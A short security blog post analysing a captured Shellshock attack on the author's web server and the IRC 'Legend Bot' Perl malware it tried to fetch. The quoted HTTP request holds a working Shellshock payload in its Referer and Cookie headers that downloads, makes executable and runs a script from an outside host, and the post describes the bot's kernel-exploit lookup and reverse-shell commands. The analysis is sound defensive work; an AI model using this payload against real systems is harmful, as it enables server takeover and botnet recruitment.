Attack of the Day

Shh.. Be very, very Quiet. We’re Hunting Rabbits

** Standard Warnings Apply **
Let me help you understand..

When this rolled in today I was thinking, “Oh, another shellshock attempt.  I wonder which code base they’ll be attempting to deliver today?”  I wouldn’t have even posted this weren’t it for the payload contained at the other end of this URL.

GET / HTTP/1.0
Host: www.planetspork.com
Accept-Encoding: identity
Referer: () { ignored;};/bin/bash -c 'wget http://www.ossrc.com/phpfmg/leg -O /tmp/.go;chmod +x /tmp/.go;perl /tmp/.go'
Cookie: () { ignored;};/bin/bash -c 'wget http://www.ossrc.com/phpfmg/leg -O /tmp/.go;chmod +x /tmp/.go;perl /tmp/.go'
Content-type: application/x-www-form-urlencoded
X-Forwarded-For: 173.15.11.25

Once opened, I see this:

#!/usr/bin/perl
 ###########################################################
 #-PRIVATE-SHIT--PRIVATE-SHIT--PRIVATE-SHIT--PRIVATE-SHIT--#
 ###########################################################
 # Legend Bot [2011] DO NOT FUCKIN SHARE! #
 # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
 # Commands: #
 # !legend @system #
 # !legend @rootable #
 # !legend @cleanlogs #
 # !legend @socks5 #
 # !legend @nmap    #
 # !legend @back  #
 # !legend @sqlflood  

First off, such language. A wag of the finger at you, sir.  Secondly, if you want to keep this private you should build in a mechanism stop random people from downloading it at will.  I mean, really.

I half expected to be able to just google “Legend Bot 2011” and have some prewritten material to reference..  There were a few things, nothing really detailing the bot itself. Mostly I found videos/forums and other crap about how to use a bot in some “League of Legends” video game. Not really what I’m looking for.

Looking through this bot, most of it is IRC handlers and the like.  One command of particular interest was named @rootable.  Very simple, really, but it looked at the currently running kernel version (uname -r) and compared it to a predefined list of known exploits.  Anything that came back as exploitable would be sent via IRC message to the bot owner.  This accomplished two things:  First, it’s a very quiet way to understand if a system is vulnerable.  No poking or testing, just comparing it to a known list.  Second, it’s very efficient.  Bot tells operator what to attempt. Operator can attempt the things that are highly likely to succeed.  That part may have been scripted, also..

The other kind of cool thing in this was a command called “@back”.  This creates a connection to a remote machine attached to a shell on the victim.  Assuming a guy might be able to chain these commands together, one could quite easily have a whole host of machines start showing up in an IRC channel saying, “Found another one.  Here’s root.  I’ll see what else I can find.  Peace.”

 

Leave a Reply

Your email address will not be published. Required fields are marked *